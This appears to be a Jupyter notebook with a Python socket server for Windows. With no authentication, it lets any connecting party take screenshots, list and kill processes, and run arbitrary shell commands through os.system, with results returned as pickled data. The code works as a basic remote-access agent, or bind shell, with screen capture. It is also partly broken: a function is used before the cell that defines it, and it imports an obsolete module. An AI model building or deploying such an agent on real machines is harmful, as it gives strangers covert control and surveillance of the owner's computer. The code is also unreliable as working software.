In [ ]:
import socket
import pickle
from boltons import socketutils
from PIL import ImageGrab
import os
import wmi
import commands

server = ""
port = 1234

# dump func
def sendDump(buff, var):
    dump = pickle.dumps(var)
    dump_size = len(dump)

    buff.send(str(dump_size).encode() + b'!!')
    buff.send(dump)
    print(f'\tSent dump data. Size: {dump_size}')

# kill process func
def getKillProcess(buff):
    pid = int(buff.recv_until(b'!!').decode())
    print(f'KILL PROCESS {pid}')

    try:
        os.kill(pid, 9)
    except:
        print('\t Err: No process with uid exist')

# process list func
def sendProcessList(buff):
    print('SEND PROCESS LIST')
    f = wmi.WMI()

    process_data = []
    for process in f.Win32_Process(["ProcessId", "Name", "ThreadCount"]):
        process_data.append([process.ProcessId, process.Name, process.ThreadCount])

    sendDump(buff, process_data)

#  screenshot func
def sendScreenShot(buff):
    print('SEND SCREENSHOT')
    image = ImageGrab.grab()
    
    sendDump(buff, image)

#close connection
def closeConnection(buff):
    print('CLOSE CONNECTION')
    buff.close()

# create socket
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.bind((server, port))

    # start socket and wait to connect
    print("Starting Server!")
    s.listen()
    conn, addr = s.accept()
    print("Connected by: ", addr)


    buff = socketutils.BufferedSocket(conn, None)

    while True:
        flag = buff.recv_until(b'!F!').decode()
        print(f'Receive: {flag}')
        
        if flag == 'screenshot':
            sendScreenShot(buff)
        elif flag == 'processlist':
            sendProcessList(buff)
        elif flag == 'killprocess':
            getKillProcess(buff)
        elif flag == 'command':
            getCommand(buff)
        else:
            closeConnection(buff)
            break

        

In [ ]:
def getCommand(buff):
    command = (buff.recv_until(b'!!').decode())
    print(f'COMMAND {command}')

    returnVal = os.system(command)
    sendDump(buff, returnVal)

In [16]:
import subprocess

list_files = subprocess.Popen("notepad")
print('done')

done
